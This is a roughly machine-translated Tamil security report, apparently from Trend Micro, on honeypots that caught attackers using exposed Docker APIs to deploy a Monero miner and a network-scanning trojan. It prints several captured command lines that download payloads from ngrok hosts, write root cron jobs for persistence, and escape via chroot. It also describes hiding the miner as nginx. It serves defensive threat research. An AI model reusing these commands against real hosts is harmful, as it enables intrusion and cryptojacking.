அச்சுறுத்தல்களைக் கண்காணிக்க நாங்கள் உருவாக்கிய ஹனிபாட் கொள்கலன்களைப் பயன்படுத்தி சேகரிக்கப்பட்ட தரவை நாங்கள் பகுப்பாய்வு செய்தோம். டோக்கர் ஹப்பில் சமூகம் வெளியிட்ட படத்தைப் பயன்படுத்தி, முரட்டுக் கொள்கலன்களாகப் பயன்படுத்தப்படும் தேவையற்ற அல்லது அங்கீகரிக்கப்படாத கிரிப்டோகரன்சி சுரங்கத் தொழிலாளர்களின் குறிப்பிடத்தக்க செயல்பாட்டை நாங்கள் கண்டறிந்தோம். தீங்கிழைக்கும் கிரிப்டோகரன்சி சுரங்கத் தொழிலாளர்களை வழங்கும் சேவையின் ஒரு பகுதியாக படம் பயன்படுத்தப்படுகிறது.
கூடுதலாக, நெட்வொர்க்குகளுடன் பணிபுரியும் நிரல்கள் திறந்த அண்டை கொள்கலன்கள் மற்றும் பயன்பாடுகளை ஊடுருவி நிறுவப்பட்டுள்ளன.
நாங்கள் எங்கள் ஹனிபாட்களை அப்படியே விட்டுவிடுகிறோம், அதாவது இயல்புநிலை அமைப்புகளுடன், எந்த பாதுகாப்பு நடவடிக்கைகளும் இல்லாமல் அல்லது கூடுதல் மென்பொருளை நிறுவாமல். பிழைகள் மற்றும் எளிய பாதிப்புகளைத் தவிர்க்க, ஆரம்ப அமைப்பிற்கான பரிந்துரைகளை Docker கொண்டுள்ளது என்பதை நினைவில் கொள்ளவும். ஆனால் பயன்படுத்தப்படும் ஹனிபாட்கள் கொள்கலன்களாகும், கொள்கலன்களின் உள்ளே உள்ள பயன்பாடுகள் அல்ல, கொள்கலன் தளத்தை இலக்காகக் கொண்ட தாக்குதல்களைக் கண்டறிய வடிவமைக்கப்பட்டுள்ளது.
கண்டறியப்பட்ட தீங்கிழைக்கும் செயல்பாடு குறிப்பிடத்தக்கது, ஏனெனில் இதற்கு பாதிப்புகள் தேவையில்லை மற்றும் டோக்கர் பதிப்பிலிருந்து சுயாதீனமாக உள்ளது. தவறாக உள்ளமைக்கப்பட்ட, அதனால் திறந்த, கண்டெய்னர் படத்தைக் கண்டறிவது தாக்குதல் நடத்துபவர்கள் பல திறந்த சேவையகங்களைப் பாதிக்க வேண்டும்.
மூடப்படாத Docker API ஆனது பயனர் பரந்த அளவிலான செயல்களைச் செய்ய அனுமதிக்கிறது , இயங்கும் கொள்கலன்களின் பட்டியலைப் பெறுதல், ஒரு குறிப்பிட்ட கொள்கலனிலிருந்து பதிவுகளைப் பெறுதல், தொடங்குதல், நிறுத்துதல் (கட்டாயப்படுத்துதல் உட்பட) மற்றும் குறிப்பிட்ட அமைப்புகளுடன் ஒரு குறிப்பிட்ட படத்திலிருந்து புதிய கொள்கலனை உருவாக்குதல் உட்பட.
இடதுபுறத்தில் தீம்பொருள் விநியோக முறை உள்ளது. வலதுபுறத்தில் தாக்குபவர்களின் சூழல் உள்ளது, இது படங்களை தொலைவில் உருட்ட அனுமதிக்கிறது.
3762 திறந்த டோக்கர் APIகளின் நாடு வாரியாக விநியோகம். 12.02.2019/XNUMX/XNUMX தேதியிட்ட ஷோடான் தேடலின் அடிப்படையில்
தாக்குதல் சங்கிலி மற்றும் பேலோட் விருப்பங்கள்
ஹனிபாட்களின் உதவியுடன் மட்டும் தீங்கிழைக்கும் செயல்பாடு கண்டறியப்பட்டது. Monero கிரிப்டோகரன்சி மைனிங் மென்பொருளைப் பயன்படுத்துவதற்குப் பாலமாகப் பயன்படுத்தப்படும் தவறாக உள்ளமைக்கப்பட்ட கொள்கலனை நாங்கள் ஆராய்ந்ததில் இருந்து வெளிப்படும் Docker APIகளின் எண்ணிக்கை (இரண்டாவது வரைபடத்தைப் பார்க்கவும்) அதிகரித்துள்ளதாக ஷோடனின் தரவு காட்டுகிறது. கடந்த ஆண்டு அக்டோபரில் (2018, தற்போதைய தரவு தோராயமாக மொழிபெயர்ப்பாளர்) 856 திறந்த APIகள் மட்டுமே இருந்தன.
ஹனிபாட் பதிவுகளை ஆய்வு செய்ததில், கொள்கலன் பட பயன்பாடும் பயன்பாட்டுடன் தொடர்புடையது என்பதைக் காட்டுகிறது , பாதுகாப்பான இணைப்புகளை நிறுவுவதற்கான கருவி அல்லது பொதுவில் அணுகக்கூடிய புள்ளிகளிலிருந்து குறிப்பிட்ட முகவரிகள் அல்லது ஆதாரங்களுக்கு டிராஃபிக்கை அனுப்புவது (உதாரணமாக லோக்கல் ஹோஸ்ட்). திறந்த சேவையகத்திற்கு பேலோடை வழங்கும்போது, தாக்குபவர்கள் மாறும் வகையில் URLகளை உருவாக்க இது அனுமதிக்கிறது. ngrok சேவையின் துஷ்பிரயோகத்தைக் காட்டும் பதிவுகளிலிருந்து குறியீடு எடுத்துக்காட்டுகள் கீழே உள்ளன:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”நீங்கள் பார்க்க முடியும் என, பதிவேற்றிய கோப்புகள் தொடர்ந்து மாறிவரும் URL களில் இருந்து பதிவிறக்கம் செய்யப்படுகின்றன. இந்த URLகள் குறுகிய காலாவதி தேதியைக் கொண்டுள்ளன, எனவே காலாவதி தேதிக்குப் பிறகு பேலோடுகளைப் பதிவிறக்க முடியாது.
இரண்டு பேலோட் விருப்பங்கள் உள்ளன. முதலாவது லினக்ஸிற்கான தொகுக்கப்பட்ட ELF மைனர் (Coinminer.SH.MALXMR.ATNO என வரையறுக்கப்பட்டுள்ளது) இது சுரங்கக் குளத்துடன் இணைக்கிறது. இரண்டாவது ஸ்கிரிப்ட் (TrojanSpy.SH.ZNETMAP.A) நெட்வொர்க் வரம்புகளை ஸ்கேன் செய்வதற்கும், பின்னர் புதிய இலக்குகளைத் தேடுவதற்கும் பயன்படுத்தப்படும் சில நெட்வொர்க் கருவிகளைப் பெற வடிவமைக்கப்பட்டுள்ளது.
டிராப்பர் ஸ்கிரிப்ட் இரண்டு மாறிகளை அமைக்கிறது, பின்னர் அவை கிரிப்டோகரன்சி மைனரைப் பயன்படுத்தப் பயன்படுகின்றன. HOST மாறியில் தீங்கிழைக்கும் கோப்புகள் இருக்கும் URL உள்ளது, மேலும் RIP மாறி என்பது சுரங்கத் தொழிலாளியின் கோப்பு பெயர் (உண்மையில் ஹாஷ்) ஆகும். ஹாஷ் மாறி மாறும் ஒவ்வொரு முறையும் HOST மாறி மாறும். தாக்கப்பட்ட சர்வரில் வேறு எந்த கிரிப்டோகரன்சி மைனர்களும் இயங்கவில்லை என்பதை ஸ்கிரிப்ட் சரிபார்க்க முயற்சிக்கிறது.
HOST மற்றும் RIP மாறிகளின் எடுத்துக்காட்டுகள், அத்துடன் வேறு சுரங்கத் தொழிலாளர்கள் இயங்கவில்லையா என்பதைச் சரிபார்க்கப் பயன்படுத்தப்படும் குறியீடு துணுக்கையும்
சுரங்கத்தைத் தொடங்குவதற்கு முன், அது nginx என மறுபெயரிடப்பட்டது. இந்த ஸ்கிரிப்ட்டின் பிற பதிப்புகள் லினக்ஸ் சூழல்களில் இருக்கும் மற்ற முறையான சேவைகளுக்கு மைனரை மறுபெயரிடுகின்றன. இயங்கும் செயல்முறைகளின் பட்டியலுக்கு எதிரான காசோலைகளைத் தவிர்ப்பதற்கு இது பொதுவாக போதுமானது.
தேடல் ஸ்கிரிப்ட் அம்சங்களையும் கொண்டுள்ளது. தேவையான கருவிகளை வரிசைப்படுத்த அதே URL சேவையுடன் இது செயல்படுகிறது. அவற்றில் zmap பைனரி உள்ளது, இது நெட்வொர்க்குகளை ஸ்கேன் செய்யவும் மற்றும் திறந்த துறைமுகங்களின் பட்டியலைப் பெறவும் பயன்படுகிறது. ஸ்கிரிப்ட் மற்றொரு பைனரியை ஏற்றுகிறது, இது கண்டுபிடிக்கப்பட்ட சேவைகளுடன் தொடர்பு கொள்ளவும், கண்டறியப்பட்ட சேவையைப் பற்றிய கூடுதல் தகவலைத் தீர்மானிக்க அவற்றிலிருந்து பேனர்களைப் பெறவும் பயன்படுகிறது (எடுத்துக்காட்டாக, அதன் பதிப்பு).
ஸ்கேன் செய்ய சில நெட்வொர்க் வரம்புகளை ஸ்கிரிப்ட் முன்கூட்டியே தீர்மானிக்கிறது, ஆனால் இது ஸ்கிரிப்ட்டின் பதிப்பைப் பொறுத்தது. இது ஸ்கேன் இயக்குவதற்கு முன், சேவைகளில் இருந்து இலக்கு போர்ட்களை அமைக்கிறது - இந்த விஷயத்தில், டோக்கர்.
சாத்தியமான இலக்குகள் கண்டறியப்பட்டவுடன், பேனர்கள் தானாகவே அவற்றிலிருந்து அகற்றப்படும். சேவைகள், பயன்பாடுகள், கூறுகள் அல்லது ஆர்வமுள்ள தளங்களைப் பொறுத்து ஸ்கிரிப்ட் இலக்குகளை வடிகட்டுகிறது: Redis, Jenkins, Drupal, MODX, , Docker 1.16 கிளையன்ட் மற்றும் Apache CouchDB. ஸ்கேன் செய்யப்பட்ட சேவையகம் அவற்றில் ஏதேனும் பொருந்தினால், அது ஒரு உரை கோப்பில் சேமிக்கப்படும், தாக்குபவர்கள் பின்னர் பகுப்பாய்வு மற்றும் ஹேக்கிங்கிற்கு பயன்படுத்தலாம். இந்த உரை கோப்புகள் டைனமிக் இணைப்புகள் வழியாக தாக்குபவர்களின் சேவையகங்களில் பதிவேற்றப்படும். அதாவது, ஒவ்வொரு கோப்பிற்கும் ஒரு தனி URL பயன்படுத்தப்படுகிறது, அதாவது அடுத்தடுத்த அணுகல் கடினமாக உள்ளது.
தாக்குதல் திசையன் என்பது டோக்கர் படமாகும், இது அடுத்த இரண்டு குறியீடுகளில் காணலாம்.
மேலே ஒரு முறையான சேவைக்கு மறுபெயரிடப்படுகிறது, மேலும் கீழே நெட்வொர்க்குகளை ஸ்கேன் செய்ய zmap எவ்வாறு பயன்படுத்தப்படுகிறது
மேலே முன் வரையறுக்கப்பட்ட நெட்வொர்க் வரம்புகள் உள்ளன, கீழே டோக்கர் உள்ளிட்ட சேவைகளைத் தேடுவதற்கான குறிப்பிட்ட போர்ட்கள் உள்ளன.
ஆல்பைன்-கர்ல் படம் 10 மில்லியனுக்கும் அதிகமான முறை பதிவிறக்கம் செய்யப்பட்டுள்ளதை ஸ்கிரீன்ஷாட் காட்டுகிறது
ஆல்பைன் லினக்ஸ் மற்றும் கர்ல் ஆகியவற்றின் அடிப்படையில், பல்வேறு நெறிமுறைகளில் கோப்புகளை மாற்றுவதற்கான வள-திறமையான CLI கருவி, நீங்கள் உருவாக்கலாம் . முந்தைய படத்தில் நீங்கள் பார்ப்பது போல், இந்த படம் ஏற்கனவே 10 மில்லியனுக்கும் அதிகமான முறை பதிவிறக்கம் செய்யப்பட்டுள்ளது. அதிக எண்ணிக்கையிலான பதிவிறக்கங்கள் இந்தப் படத்தை நுழைவுப் புள்ளியாகப் பயன்படுத்துவதைக் குறிக்கலாம்; இந்தப் படம் ஆறு மாதங்களுக்கு முன்பு புதுப்பிக்கப்பட்டது; பயனர்கள் இந்தக் களஞ்சியத்திலிருந்து மற்ற படங்களை அடிக்கடி பதிவிறக்கம் செய்யவில்லை. டோக்கரில் - ஒரு கொள்கலனை இயக்குவதற்கு கட்டமைக்கப் பயன்படுத்தப்படும் வழிமுறைகளின் தொகுப்பு. நுழைவுப் புள்ளி அமைப்புகள் தவறாக இருந்தால் (உதாரணமாக, கன்டெய்னர் இணையத்தில் இருந்து திறந்திருக்கும்), படத்தை ஒரு தாக்குதல் திசையனாகப் பயன்படுத்தலாம். தவறாக உள்ளமைக்கப்பட்ட அல்லது திறந்த கண்டெய்னரை ஆதரிக்காமல் விடப்பட்டால், தாக்குபவர்கள் பேலோடை வழங்க அதைப் பயன்படுத்தலாம்.
இந்த படம் (ஆல்பைன்-கர்ல்) தீங்கிழைக்கும் அல்ல என்பதை கவனத்தில் கொள்ள வேண்டும், ஆனால் நீங்கள் மேலே பார்க்க முடியும் என, தீங்கிழைக்கும் செயல்பாடுகளைச் செய்ய இது பயன்படுத்தப்படலாம். இதே போன்ற டோக்கர் படங்களையும் தீங்கிழைக்கும் செயல்களைச் செய்யப் பயன்படுத்தலாம். நாங்கள் டோக்கரைத் தொடர்புகொண்டு இந்தப் பிரச்சினையில் அவர்களுடன் இணைந்து பணியாற்றினோம்.
பரிந்துரைகளை
உள்ளது பல நிறுவனங்களுக்கு, குறிப்பாக செயல்படுத்துபவர்களுக்கு , விரைவான வளர்ச்சி மற்றும் விநியோகத்தில் கவனம் செலுத்துகிறது. தணிக்கை மற்றும் கண்காணிப்பு விதிகளுக்கு இணங்க வேண்டிய அவசியம், தரவு ரகசியத்தன்மையைக் கண்காணிக்க வேண்டிய அவசியம் மற்றும் அவற்றின் இணக்கமின்மையால் ஏற்படும் பெரும் சேதம் ஆகியவற்றால் எல்லாம் மோசமாகிறது. டெவலப்மென்ட் லைஃப்சைக்கிளில் பாதுகாப்பு ஆட்டோமேஷனைச் சேர்ப்பது, கண்டறியப்படாமல் போகக்கூடிய பாதுகாப்பு ஓட்டைகளைக் கண்டறிய உதவுவது மட்டுமல்லாமல், கண்டுபிடிக்கப்பட்ட ஒவ்வொரு பாதிப்புக்கும் கூடுதல் மென்பொருளை உருவாக்குவது அல்லது பயன்பாடு பயன்படுத்தப்பட்ட பிறகு தவறான உள்ளமைவு போன்ற தேவையற்ற பணிச்சுமையைக் குறைக்கவும் உதவுகிறது.
இந்தக் கட்டுரையில் விவாதிக்கப்பட்ட சம்பவம், பின்வரும் பரிந்துரைகள் உட்பட, ஆரம்பத்திலிருந்தே பாதுகாப்பைக் கருத்தில் கொள்ள வேண்டியதன் அவசியத்தை எடுத்துக்காட்டுகிறது:
- சிஸ்டம் நிர்வாகிகள் மற்றும் டெவலப்பர்களுக்கு: குறிப்பிட்ட சர்வர் அல்லது இன்டர்னல் நெட்வொர்க்கிலிருந்து வரும் கோரிக்கைகளை மட்டும் ஏற்கும் வகையில் அனைத்தும் உள்ளமைக்கப்பட்டுள்ளதா என்பதை உறுதிப்படுத்த உங்கள் API அமைப்புகளை எப்போதும் சரிபார்க்கவும்.
- குறைந்தபட்ச உரிமைகளின் கொள்கையைப் பின்பற்றவும்: கொள்கலன் படங்கள் கையொப்பமிடப்பட்டு சரிபார்க்கப்படுவதை உறுதிசெய்யவும், முக்கியமான கூறுகளுக்கான அணுகலைக் கட்டுப்படுத்தவும் (கொள்கலன் வெளியீட்டு சேவை) மற்றும் பிணைய இணைப்புகளுக்கு குறியாக்கத்தைச் சேர்க்கவும்.
- பின்பற்றுங்கள் மற்றும் பாதுகாப்பு வழிமுறைகளை இயக்கவும், எ.கா. மற்றும் உள்ளமைக்கப்பட்ட .
- கொள்கலனில் இயங்கும் செயல்முறைகள் பற்றிய கூடுதல் தகவலைப் பெற, இயக்க நேரங்கள் மற்றும் படங்களின் தானியங்கு ஸ்கேனிங்கைப் பயன்படுத்தவும் (உதாரணமாக, ஏமாற்றுவதைக் கண்டறிய அல்லது பாதிப்புகளைத் தேட). பயன்பாட்டுக் கட்டுப்பாடு மற்றும் ஒருமைப்பாடு கண்காணிப்பு ஆகியவை சர்வர்கள், கோப்புகள் மற்றும் சிஸ்டம் பகுதிகளில் ஏற்படும் அசாதாரண மாற்றங்களைக் கண்காணிக்க உதவுகின்றன.
DevOps குழுக்கள் பாதுகாப்பாக உருவாக்கவும், விரைவாக வெளியேறவும், எங்கும் தொடங்கவும் Trendmicro உதவுகிறது. ட்ரெண்ட் மைக்ரோ ஒரு நிறுவனத்தின் DevOps பைப்லைன் முழுவதும் சக்திவாய்ந்த, நெறிப்படுத்தப்பட்ட மற்றும் தானியங்கு பாதுகாப்பை வழங்குகிறது மற்றும் பல அச்சுறுத்தல் பாதுகாப்புகளை வழங்குகிறது இயக்க நேரத்தில் உடல், மெய்நிகர் மற்றும் கிளவுட் பணிச்சுமைகளைப் பாதுகாக்க. இது கொள்கலன் பாதுகாப்பையும் சேர்க்கிறது и , டோக்கர் கன்டெய்னர் படங்களை டெவலப்மெண்ட் பைப்லைனில் எந்த இடத்திலும் மால்வேர் மற்றும் பாதிப்புகள் உள்ளதா என ஸ்கேன் செய்து, அச்சுறுத்தல்களைத் தடுக்கும்.
சமரசத்தின் அறிகுறிகள்
தொடர்புடைய ஹாஷ்கள்:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
மீது நிகழ்தகவைக் குறைக்க அல்லது மேலே விவரிக்கப்பட்ட சூழ்நிலையின் நிகழ்வை முற்றிலுமாகத் தவிர்ப்பதற்கு முதலில் என்ன அமைப்புகளைச் செய்ய வேண்டும் என்பதை பயிற்சி பேச்சாளர்கள் காட்டுகிறார்கள். ஆகஸ்ட் 19-21 அன்று ஒரு ஆன்லைன் தீவிரத்தில் இதைப் போன்ற பாதுகாப்புச் சிக்கல்களைப் பற்றி நீங்கள் சக பணியாளர்கள் மற்றும் பயிற்சி ஆசிரியர்களுடன் ஒரு வட்ட மேசையில் விவாதிக்கலாம், அங்கு அனைவரும் பேசலாம் மற்றும் அனுபவம் வாய்ந்த சக ஊழியர்களின் வலிகள் மற்றும் வெற்றிகளைக் கேட்கலாம்.
ஆதாரம்: www.habr.com